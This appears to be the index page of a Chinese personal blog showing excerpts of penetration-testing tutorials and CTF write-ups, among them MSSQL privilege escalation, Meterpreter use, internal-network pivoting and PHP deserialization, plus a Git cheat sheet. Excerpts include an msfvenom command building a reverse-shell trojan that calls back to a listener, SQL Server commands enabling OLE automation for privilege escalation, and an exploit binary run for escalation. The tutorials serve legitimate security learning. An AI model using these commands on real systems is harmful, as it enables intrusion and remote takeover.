刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

SQL Server提权方法汇总(MSSQL)

使用sp_oacreate进行提权--提权语句--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1EXEC sp_configure 'show advanced options', 1; --使前面的配置生效RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIG

Meterpreter提权详解

0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为4444,

Meterpreter命令详解

0x01初识Meterpreter1.1.什么是Meterpreter  Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远

内网渗透之横向渗透

前言在一次测试中发现某系统存在SQL注入漏洞。且IIS可暴露绝对路径。使用--os-shell命令,填写绝对路径可执行系统命令。提权sqlmap在执行--os-shellI命令时向服务器写入了上传文件的脚本。通过文件上传可直接上传大马。简单执行几条系统命令查看该服务器基本情况。权限不够,上传cve-2018-8120.exe进行提权。cve-2018-8120.exe  "whoami"cve-2018-8120.exe  "

内网渗透经验(代理篇)

前言最近参与内网渗透比较多,认知到自己在会话维持上过于依赖web服务,web服务一旦关闭,便失去了唯一的入口点。本次以远程桌面连接来进行说明,介绍几种常用的连接方式。本次目标主机ip为:172.16.86.153msf反弹木马使用条件:服务器通外网,拥有自己的公网ipmsf是我进行内网渗透中用的最多的工具,它内置了很多强大的功能,用起来相当方便。msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。portfwd add -l 5555&nb

内网渗透之端口转发与代理工具总结

注:文中提到的所有工具下载地址 https://github.com/Brucetg/Pentest-tools一、LCXlcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,Windows版使用方法如下:lcx有两大功能:1)端口转发(listen和slave成对使用)2)端口映射(tran)1、lcx 内网端口转发1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主

Git常用命令总结

git config  git config命令的作用是配置git的相关信息。配置全局的用户名和邮箱,mac下可通过终端输入命令cat ~/.gitconfig查看配置信息。设置用户名:git config --global user.name "name"设置用户邮箱:git config --global user.email "eamil"针对单个仓库配置用户名和邮箱,mac下可通过终端进入到项目的根目录中,然后输入命令cat .git/config

2019湖湘杯web(代码审计 untar) writeup

<?php     $sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);     echo $sandbox."</br>";     @mkdir($sandbox);  &nb

2019年CNAS网络安全等级保护测评能力验证与攻防大赛 Writeup

第一题身份鉴别   分数:100【IP】:172.20.2.30【端口】  9001【标准要求】8.1.4.1 身份鉴别 b)应具有登录失败处理功能,应配置并启用结束会话、限制非法登录次数和当登录连接超时自动退出等相关措施。【场景说明】网络安全等级保护标准中要求,应用系统应该对用户进行身份标识和鉴别,当存在非法暴力破解、弱口令猜测、连续登录失败次数过多等情况,应该配置并启用结束会话、限制非法登录次数/频率和当登录连接超时自动退出等相关措施,防止用户名和口令

CTF PHP反序列化

目录php反序列化1、序列的含义2、public、protected、private下序列化对象的区别1、构造函数和析构函数2、__sleep()和__wakeup()3、__toString()4、__set(), __get(), __isset(), __unset()5、其他一、序列化二、魔术方法三、序列化细节四、反序列化的利用五、Session序列化问题六、Phar反序列化php反序列化一、序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.